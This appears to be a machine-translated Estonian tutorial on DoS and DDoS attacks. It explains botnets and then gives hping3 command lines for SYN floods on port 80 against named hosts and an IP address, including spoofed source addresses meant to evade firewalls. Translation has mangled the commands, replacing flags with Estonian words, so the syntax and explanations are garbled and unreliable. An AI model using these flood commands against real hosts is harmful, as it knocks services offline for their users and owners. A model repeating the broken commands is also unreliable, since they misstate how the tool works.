DOS rünnakud
Teenuse keelamise (DOS) rünnak on väga lihtne meetod teenustele juurdepääsu keelamiseks (sellepärast nimetatakse seda teenuse keelamise rünnakuks). See rünnak seisneb sihtmärgi ülekoormamises liiga suurte pakettidega või nende suure kogusega.
Kuigi seda rünnakut on väga lihtne teostada, ei kahjusta see sihtmärgi teavet ega privaatsust, see ei ole läbitungiv rünnak ja selle eesmärk on ainult takistada sihtmärgile juurdepääsu.
Saates hulga pakette, ei saa sihtmärk ründajatega hakkama, takistades serverit seaduslikke kasutajaid teenindamast.
DOS -rünnakud viiakse läbi ühest seadmest, seetõttu on neid lihtne peatada, blokeerides ründaja IP, kuid ründaja saab sihtmärgi IP -aadressi muuta ja isegi võltsida (kloonida), kuid tulemüüridel pole selliste rünnakutega raske toime tulla , vastupidiselt DDOS -rünnakutega toimuvale.
DDOS rünnakud
Hajutatud teenuse keelamise rünnak (DDOS) sarnaneb DOS -rünnakuga, kuid seda teostatakse samaaegselt erinevatest sõlmedest (või erinevatest ründajatest). Tavaliselt viivad DDOS -i rünnakud läbi robotivõrgud. Botovõrgud on automatiseeritud skriptid või programmid, mis nakatavad arvuteid automatiseeritud ülesande täitmiseks (antud juhul DDOS -rünnak). Häkker võib luua robotivõrgu ja nakatada paljusid arvuteid, kust botivõrgud käivitavad DOS -rünnakuid, kuna paljud robotivõrgud tulistavad samaaegselt, muudavad DOS -i rünnaku DDOS -rünnakuks (sellepärast nimetatakse seda hajutatuks).
Loomulikult on ka erandeid, kus DDOS -i rünnakuid korraldasid tõelised inimründajad, näiteks tuhandete inimeste üle maailma integreeritud häkkerite rühm Anonymous kasutas seda tehnikat väga sageli selle lihtsa rakendamise tõttu (selleks oli vaja ainult vabatahtlikke, kes jagasid oma põhjust), näiteks jättis Anonüümne sissetungi ajal Gaddafi Liibüa valitsuse täielikult lahti ühendatuks, Liibüa osariik jäi kaitsetuks tuhandete ründajate ees kogu maailmast.
Seda tüüpi rünnakuid, kui neid sooritada paljudest erinevatest sõlmedest, on äärmiselt raske ära hoida ja peatada ning tavaliselt on nendega tegelemiseks vaja spetsiaalset riistvara, sest tulemüürid ja kaitserakendused ei ole valmis tuhandete ründajatega samaaegselt toime tulema. See ei kehti hping3 puhul, enamik selle tööriista kaudu tehtud rünnakuid blokeerivad kaitseseadmed või tarkvara, kuid see on kasulik kohalikes võrkudes või halvasti kaitstud sihtmärkide vastu.
Teave hpingi kohta3
Tööriist hping3 võimaldab saata manipuleeritud pakette. See tööriist võimaldab teil kontrollida pakettide suurust, kogust ja killustatust, et sihtmärki üle koormata ning tulemüüre mööda minna või rünnata. Hping3 võib olla kasulik turvalisuse või võimete testimise eesmärgil, kasutades seda saate testida tulemüüride tõhusust ja seda, kas server saab hakkama suure hulga pakettidega. Allpool leiate juhised hping3 kasutamiseks turvatestide tegemiseks.
DDOS -rünnakutega alustamine hping3 abil:
Debiani ja Linuxi põhistes distributsioonides saate hping3 installida järgmiselt:
#asjakohanepaigaldadahping3-ja 
Lihtne DOS (mitte DDOS) rünnak oleks järgmine:
#sudohping3-S -vesi -V -lk 80170,155.9.185 
Kus:
sudo: annab hping3 käivitamiseks vajalikud õigused.
hping3: kutsub programmi hping3.
-S: määrab SYN -paketid.
- üleujutus: tulistage oma äranägemise järgi, vastuseid ignoreeritakse (sellepärast vastuseid ei näidata) ja paketid saadetakse võimalikult kiiresti.
-V: Paljusõnalisus.
-lk 80: porti 80, saate selle numbri asendada teenusega, mida soovite rünnata.
170.155.9.185: siht -IP.
Üleujutus, kasutades SYN -pakette pordi 80 vastu:
Järgmine näide kujutab SYN -i rünnakut lacampora.org vastu:
#sudohping3 lacampora.org-q -n -d 120 -S -lk 80 -vesi -ja allikasKus:
Lacampora.org: on sihtmärk
-q: lühike väljund
-n: näita hosti asemel siht -IP -d.
-d 120: määrake paketi suurus
-ja allikas: peida IP -aadress.
Järgmine näide näitab veel üht võimalikku üleujutuse näidet:
SYNi üleujutus pordi 80 vastu:
#sudohping3-ja allikasivan.com-S -q -lk 80 -vesi 
Hping3 abil saate oma sihtmärke rünnata ka võltsitud IP -ga, tulemüürist mööda hiilimiseks võite isegi oma siht -IP -d ise või mis tahes lubatud aadressi kloonida (saate seda saavutada näiteks Nmapi või nuusutaja abil ühendused).
Süntaks oleks järgmine:
#sudohping3-juurde <FAKE IP> <sihtmärk> -S -q -lk 80 -kiiremini -c2Selles praktilises näites näib rünnak:
#sudohping3-juurde190.0.175.100 190.0.175.100-S -q -lk 80 -kiiremini -c2 
Loodan, et see õpetus hping3 kohta oli teile kasulik. Linuxi ja võrgustike kohta näpunäidete ja värskenduste saamiseks järgige Linuxi vihjet.